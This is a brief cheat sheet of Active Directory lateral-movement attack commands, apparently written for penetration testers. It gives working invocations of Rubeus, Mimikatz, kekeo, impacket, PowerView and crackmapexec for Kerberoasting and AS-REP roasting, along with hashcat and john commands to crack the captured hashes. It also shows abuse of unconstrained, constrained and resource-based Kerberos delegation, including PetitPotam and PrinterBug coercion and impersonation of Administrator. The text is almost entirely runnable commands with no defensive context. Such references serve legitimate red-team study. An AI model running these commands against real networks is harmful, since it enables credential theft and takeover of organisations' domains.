Neko

Active Directory Lateral Movement

Cheat Sheet

Last updated: March 5th, 2023

Kerberoasting

Found SPN

Extract Hash

#Specific Account
Rubeus.exe kerberoast /user:{USER} /rc4opsec /outfile:hashes.txt
Request-SPNTicket -SPN "{SPN}" -OutputFormat {Hashcat:John} | % {$_.Hash} > hashes.txt
impacket-GetUserSPNs -request -dc-ip {Full.domain}/{USER}:{PASS} -request-user {USER} -outputfile hashes.txt
#All Accounts
Invoke-Kerberoast -OuputFormat {Hashcat:John} | % {$_.Hash} > hashes.txt
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat {hashcat:john} > hashes.txt
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
crackmapexec ldap DC-IP -u {USER} -P {PASS} --kerberoasting hashes.txt
impacket-GetUserSPNs -request -dc-ip {IP} {Full.domain}/{USER}:{PASS} -outputfile hashes.txt
kerberos::list /export #from mem to disk

Cracking Hashes

john --wordlist=wordlist.txt hashes.txt
hashcat -m 13100 --force -a 0 hashes.txt {wordlist.txt}

Set SPN

Set-DomainObject -Identify {USER} -Set @{serviceprincipalname='Service/Name'}

Kerberos Delegation

Unconstrained Delegation

Basic

#Dumping Tickets
Invoke-Mimikatz -Command '''sekurlsa::tickets /export'''

#Using Tickets
Invoke-Mimikatz -Command '''kerberos::ptt {C:\Path\To\Ticket}'''

Using Exploits

#Ticket Monitoring
Rubeus.exe monitor /interval:5 /nowrap

#Running Exploits
.\MS-RPN.exe \\dc.domain.com \\VulnMachine.domain.com #PrinterBug
.\PetitPotam.exe {VulnPC} {DC}

#Using Tickets
Rubeus.exe ptt /ticket:{base64 Ticket}

Constrained Delegation

#mimikatz + kekeo
kekeo# tgt::ask /user:{USER} /domain:{full.domain.com} /rc4:{HASH} #request tgt
kekeo# tgs::s4u /tgt:{TGT-File}.kiribi /user:Administrator@Domain.com /service:{CIFS}/{PC.Domain.com} #request tgs
Invoke-Mimikatz -Command '''kerberos::ptt {TICKET}.kiribi'''

#rubeus
Rubeus.exe s4u /user:websvc /aes256:{USER AES} /impersonateuser:Administrator /msdsspn:service/pc.domain.com /ptt

Resource Based

Set-ADComputer -Identity dcorp-mgmt -PrincipalsAllowedToDelegateToAccount {PWNedHost$}
Rubeus.exe s4u /user:{PWNED}$ /aes256:{PC$ aes256} /msdsspn:{SVC}/{SVCMACHINE} /impersonateuser:administrator /ptt

AS-REP Roasting

Dumping Hashes

#specific account
Get-ASREPHash -UserName {user} -Verbose

#all accounts
Rubeus.exe asreproast /format:{hashcat:john} /outfile:hashes
crackmapexec ldap DC-IP -u {user} -p {pass} --asreproast hashes.txt
##getnpusers
###with creds
impacket-getnpusers -request -dc-ip {ip} {full.domain}/{user}:{password} -format {hashcat:john} -outputfile hashes.txt
###with a users file
impacket-getnpusers -request -dc-ip {ip} --usersfile -users.txt {full.domain}/ -format {hashcat:john} -outputfile hashes.txt

Cracking Hashes

john --wordlist={wlpath} hashes.txt
hashcat -m 18200 --force -a 0 hashes.txt {wlpath}